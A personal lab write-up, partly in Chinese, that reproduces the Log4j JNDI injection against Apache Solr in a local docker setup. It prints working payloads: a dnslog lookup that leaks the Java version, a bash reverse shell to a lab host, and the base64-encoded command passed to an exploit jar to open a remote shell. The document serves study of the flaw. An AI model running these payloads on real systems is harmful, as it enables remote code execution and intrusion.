1. Vulnerability Details
Affects versions Apache Log4j 2.x <= 2.14.1
Apache Log4j is a logging library for Java that supports starting remote log servers.
JNDI injection vulnerability
JNDI (Java Naming and Directory Interface) is a set of application programming interfaces, which provides a unified common interface for developers to find and access various resources, and can be used to locate various resources such as users, networks, machines, objects and services. The bottom layer of JNDI supports RMI remote objects, and the services registered by RMI can be accessed and invoked through the JNDI interface. When the JNDI interface is initialized, the RMI URL can be passed in as a parameter, and the JNDI injection appears in the lookup() function of the client. If the parameters of the lookup() are controllable, it may be attacked, causing the log to record the data entered by the user. , an injection vulnerability is triggered that could lead to remote code execution.
Format:
${jndi:rmi//127.0.0.1:1099/a}
means to obtain the variable content on rmi//127.0.0.1:1099/a through the JNDI Lookup function.
2. Recurrence process
Build a docker environment
docker-compose up -d
docker-compose ps
access port
Get a temporary domain name on dnslog
construct payload
http://192.168.239.128:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.wujr3s.dnslog.cn}
Refresh the dnslog
You can see that the java version is returned, that is, the sys:java.version command is successfully executed
rebound shell
start monitoring
下载漏洞利用的jar文件 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
git clone https://github.com/bkfish/Apache-Log4j-Learning.git
#bash反弹命令
bash -i >& /dev/tcp/192.168.239.128/19999 0>&1
用base64进行编码
注意这里一定要进到正确的目录下面!!不然会报错
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS4xMjgvMTk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.239.128"
我们使用生成的payload
这里我选了第二个,其实都一样
构造payload
http://192.168.239.128:8983/solr/admin/cores?action=${jndi:ldap://192.168.239.128:1389/n4fk6l}
回车!
发现监听成功了
三、总结
在反弹shell那边卡了好一会,一开始就没搞懂要干嘛,果然还是学术不精。
睡觉了睡觉了,明天又是新的学习日。
good good study,day day up。